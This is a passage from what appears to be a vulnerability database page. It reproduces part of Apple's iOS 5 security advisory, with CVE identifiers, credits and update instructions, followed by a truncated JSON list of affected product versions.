    UIKit Alerts Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a malicious website may cause an unexpected device hang Description: An excessive maximum text layout length permitted malicious websites to cause iOS to hang when drawing acceptance dialogs for very long tel: URIs. This issue is addressed by using a more reasonable maximum URI size. CVE-ID CVE-2011-3432 : Simon Young of Anglia Ruskin University

    WebKit Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in WebKit. CVE-ID CVE-2011-0218 : SkyLined of Google Chrome Security Team CVE-2011-0221 : Abhishek Arya (Inferno) of Google Chrome Security Team CVE-2011-0222 : Nikita Tarakanov and Alex Bazhanyuk of the CISS Research Team, and Abhishek Arya (Inferno) of Google Chrome Security Team CVE-2011-0225 : Abhishek Arya (Inferno) of Google Chrome Security Team CVE-2011-0232 : J23 working with TippingPoint's Zero Day Initiative CVE-2011-0233 : wushi of team509 working with TippingPoint's Zero Day Initiative CVE-2011-0234 : Rob King working with TippingPoint's Zero Day Initiative, wushi of team509 working with TippingPoint's Zero Day Initiative CVE-2011-0235 : Abhishek Arya (Inferno) of Google Chrome Security Team CVE-2011-0238 : Adam Barth of Google Chrome Security Team CVE-2011-0254 : An anonymous researcher working with TippingPoint's Zero Day Initiative CVE-2011-0255 : An anonymous reporter working with TippingPoint's Zero Day Initiative CVE-2011-0981 : Rik Cabanier of Adobe Systems, Inc CVE-2011-0983 : Martin Barbella CVE-2011-1109 : Sergey Glazunov CVE-2011-1114 : Martin Barbella CVE-2011-1115 : Martin Barbella CVE-2011-1117 : wushi of team509 CVE-2011-1121 : miaubiz CVE-2011-1188 : Martin Barbella CVE-2011-1203 : Sergey Glazunov CVE-2011-1204 : Sergey Glazunov CVE-2011-1288 : Andreas Kling of Nokia CVE-2011-1293 : Sergey Glazunov CVE-2011-1296 : Sergey Glazunov CVE-2011-1449 : Marek Majkowski CVE-2011-1451 : Sergey Glazunov CVE-2011-1453 : wushi of team509 working with TippingPoint's Zero Day Initiative CVE-2011-1457 : John Knottenbelt of Google CVE-2011-1462 : wushi of team509 CVE-2011-1797 : wushi of team509 CVE-2011-2338 : Abhishek Arya (Inferno) of Google Chrome Security Team using AddressSanitizer CVE-2011-2339 : Cris Neckar of the Google Chrome Security Team CVE-2011-2341 : Apple CVE-2011-2351 : miaubiz CVE-2011-2352 : Apple CVE-2011-2354 : Apple CVE-2011-2356 : Adam Barth and Abhishek Arya of Google Chrome Security Team using AddressSanitizer CVE-2011-2359 : miaubiz CVE-2011-2788 : Mikolaj Malecki of Samsung CVE-2011-2790 : miaubiz CVE-2011-2792 : miaubiz CVE-2011-2797 : miaubiz CVE-2011-2799 : miaubiz CVE-2011-2809 : Abhishek Arya (Inferno) of Google Chrome Security Team CVE-2011-2813 : Cris Neckar of Google Chrome Security Team using AddressSanitizer CVE-2011-2814 : Abhishek Arya (Inferno) of Google Chrome Security Team using AddressSanitizer CVE-2011-2816 : Apple CVE-2011-2817 : Abhishek Arya (Inferno) of Google Chrome Security Team using AddressSanitizer CVE-2011-2818 : Martin Barbella CVE-2011-2820 : Raman Tenneti and Philip Rogers of Google CVE-2011-2823 : SkyLined of Google Chrome Security Team CVE-2011-2827 : miaubiz CVE-2011-2831 : Abhishek Arya (Inferno) of Google Chrome Security Team using AddressSanitizer CVE-2011-3232 : Aki Helin of OUSPG CVE-2011-3234 : miaubiz CVE-2011-3235 : Dimitri Glazkov, Kent Tamura, Dominic Cooney of the Chromium development community, and Abhishek Arya (Inferno) of Google Chrome Security Team CVE-2011-3236 : Abhishek Arya (Inferno) of Google Chrome Security Team using AddressSanitizer CVE-2011-3237 : Dimitri Glazkov, Kent Tamura, Dominic Cooney of the Chromium development community, and Abhishek Arya (Inferno) of Google Chrome Security Team CVE-2011-3244 : vkouchna

    WebKit Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: A cross-origin issue existed in the handling of URLs with an embedded username. This issue is addressed through improved handling of URLs with an embedded username. CVE-ID CVE-2011-0242 : Jobert Abma of Online24

    WebKit Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: A cross-origin issue existed in the handling of DOM nodes. CVE-ID CVE-2011-1295 : Sergey Glazunov

    WebKit Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: A maliciously crafted website may be able to cause a different URL to be shown in the address bar Description: A URL spoofing issue existed in the handling of the DOM history object. CVE-ID CVE-2011-1107 : Jordi Chancel

    WebKit Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A configuration issue existed in WebKit's use of libxslt. Visiting a maliciously crafted website may lead to arbitrary files being created with the privileges of the user, which may lead to arbitrary code execution. This issue is addressed through improved libxslt security settings. CVE-ID CVE-2011-1774 : Nicolas Gregoire of Agarri

    WebKit Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a malicious website and dragging content in the page may lead to an information disclosure Description: A cross-origin issue existed in WebKit's handling of HTML5 drag and drop. This issue is addressed by disallowing drag and drop across different origins. CVE-ID CVE-2011-0166 : Michal Zalewski of Google Inc.

    WebKit Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a maliciously crafted website may lead to an information disclosure Description: A cross-origin issue existed in the handling of Web Workers. CVE-ID CVE-2011-1190 : Daniel Divricean of divricean.ro

    WebKit Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: A cross-origin issue existed in the handling of the window.open method. CVE-ID CVE-2011-2805 : Sergey Glazunov

    WebKit Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: A cross-origin issue existed in the handling of inactive DOM windows. CVE-ID CVE-2011-3243 : Sergey Glazunov

    WebKit Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: A cross-origin issue existed in the handling of the document.documentURI property. CVE-ID CVE-2011-2819 : Sergey Glazunov

    WebKit Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: A maliciously crafted website may be able to track the URLs that a user visits within a frame Description: A cross-origin issue existed in the handling of the beforeload event. CVE-ID CVE-2011-2800 : Juho Nurminen

    WiFi Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: WiFi credentials may be logged to a local file Description: WiFi credentials including the passphrase and encryption keys were logged to a file that was readable by applications on the system. This is resolved by no longer logging these credentials. CVE-ID CVE-2011-3434 : Laurent OUDOT of TEHTRI Security

    Installation note:

    This update is only available through iTunes, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/

    iTunes will automatically check Apple's update server on its weekly schedule. When an update is detected, it will download it. When the iPhone, iPod touch or iPad is docked, iTunes will present the user with the option to install the update. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iPhone, iPod touch, or iPad.

    The automatic update process may take up to a week depending on the day that iTunes checks for updates. You may manually obtain the update via the Check for Updates button within iTunes. After doing this, the update can be applied when your iPhone, iPod touch, or iPad is docked to your computer.

    To check that the iPhone, iPod touch, or iPad has been updated:

    • Navigate to Settings
    • Select General
    • Select About. The version after applying this update will be "5 (9A334)".

    Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222

    This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/

    -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin)

    iQEcBAEBAgAGBQJOldmtAAoJEGnF2JsdZQee/qMIAIPxmIiOqj+FMLFHZtPeC/Dp 3s4JliKOOgNnjXkxErfaNvYGmeVbDaUER5jdVrWccTauzlYmy8G4uK0An2GD2YiP gB5AiCQXpONdBCi38QNdRqrYoYjc8Sa0nUp4r5uWPoiHoj5KfxvBpgygEL+zjHXS fmnrONOCWhOYp0w4q6mdTg5BH2uJCbXscD/JjbmgHQI0Vs/iUZKSRyqFo2b0Mvze NiSyzcj/4l62Cxx7xM9VbdrYL7Al2yyHfNYJQsZmoeDUlJQcdgEgEMXvOuhY3sFK maxYr2oCp6Mtf53fplAeJIV4ijLynEWAKxTuTznAyW1k7oiGrDTfORSFKPEB9MQ= =LCQZ -----END PGP SIGNATURE-----

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201103-0291",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apple",
            "version": "9.0.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apple",
            "version": "9.2.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apple",
            "version": "9.0.2"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apple",
            "version": "9.2"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "apple",
            "version": "10.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apple",
            "version": "10.0.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apple",
            "version": "10.1.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apple",
            "version": "10.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "apple",
            "version": "9.0.3"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "8.2"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "7.3.2"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "7.4"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "7.3.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "4.7.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "6.0.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "7.0.2"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "5.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "6.0.4"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "4.5"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "8.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "4.6"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "6.0.3"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "6.0.5"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "apple",
            "version": "4.7"
          },
          {
            "model": "tv",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "apple",
            "version": "4.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "apple",
            "version": "10"
          },
          {
            "model": "tv",
            "scope": "eq",
            "trust": 1.1,
            "vendor": "apple",
            "version": "4.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.6"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "5.0.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "8.0.2"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.7.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.5.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "4.6.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.2.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "4.8.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "6.0.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.1.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.4.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "4.7.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "4.0.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.7.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "5.0.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.3.0"
          },
          {
            "model": "itunes",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "apple",
            "version": "10.1.2"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.1.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "8.1.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.0.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "6.0.4.2"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "4.2.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.7"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.0.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.6.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "4.7.2"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.6.2"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "8.2.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.4.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "9.0.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "4.0.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "4.9.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.4.3"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.4.2"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "8.0.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "4.1.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.6.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "8.0.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "4.5.0"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "7.5"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "6.0.2"
          },
          {
            "model": "mac os x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.5.8"
          },
          {
            "model": "mac os x server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.5.8"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "3.0 to  4.2.1 (iphone 3gs after )"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "3.1 to  4.2.1 (ipod touch (3rd generation) after )"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "3.2 to  4.2.1 (ipad for )"
          },
          {
            "model": "ipad",
            "scope": null,
            "trust": 0.8,
            "vendor": "apple",
            "version": null
          },
          {
            "model": "iphone",
            "scope": null,
            "trust": 0.8,
            "vendor": "apple",
            "version": null
          },
          {
            "model": "ipod touch",
            "scope": null,
            "trust": 0.8,
            "vendor": "apple",
            "version": null
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "5"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (as)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (es)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (ws)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4.8 (as)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4.8 (es)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5 (server)"
          },
          {
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4.0"
          },
          {
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5.0 (client)"
          },
          {
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "6"
          },
          {
            "model": "enterprise linux hpc node",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "6"
          },
          {
            "model": "enterprise linux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "6"
          },
          {
            "model": "enterprise linux workstation",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "6"
          },
          {
            "model": "rhel desktop workstation",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5 (client)"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "apple",
            "version": "10.1.2"
          },
          {
            "model": "in motion blackberry enterprise server for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.1"
          },
          {
            "model": "tv",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2"
          },
          {
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.7"
          },
          {
            "model": "in motion blackberry enterprise server for novell groupwise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1"
          },
          {
            "model": "in motion blackberry enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.0.3"
          },
          {
            "model": "linux enterprise sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "8.0"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.6"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0.1"
          },
          {
            "model": "in motion blackberry enterprise server express for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.0"
          },
          {
            "model": "in motion blackberry enterprise server for exchange sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.0"
          },
          {
            "model": "ios",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.3"
          },
          {
            "model": "in motion blackberry enterprise server for domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.1"
          },
          {
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.1.1"
          },
          {
            "model": "in motion blackberry enterprise server express for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.4"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.7"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.4"
          },
          {
            "model": "opencall multiservice controller sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.0"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.5"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0.1"
          },
          {
            "model": "in motion blackberry enterprise server for domino sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1"
          },
          {
            "model": "beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "4.0"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.04"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0.2"
          },
          {
            "model": "in motion blackberry enterprise server for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0"
          },
          {
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.1"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2.10"
          },
          {
            "model": "hat enterprise linux hpc node",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "6"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.04"
          },
          {
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.3"
          },
          {
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2.8"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.5"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.7.4"
          },
          {
            "model": "in motion blackberry enterprise server for domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0"
          },
          {
            "model": "itunes",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "10.2"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.6.0"
          },
          {
            "model": "aura system platform sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.10"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.2"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "5.0.2"
          },
          {
            "model": "in motion blackberry enterprise server express for exchange mr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "model": "linux enterprise sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "in motion blackberry enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.6"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.04"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.6"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2010.1"
          },
          {
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "aura application server sip core",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "53002.0"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.7.2-7"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.4"
          },
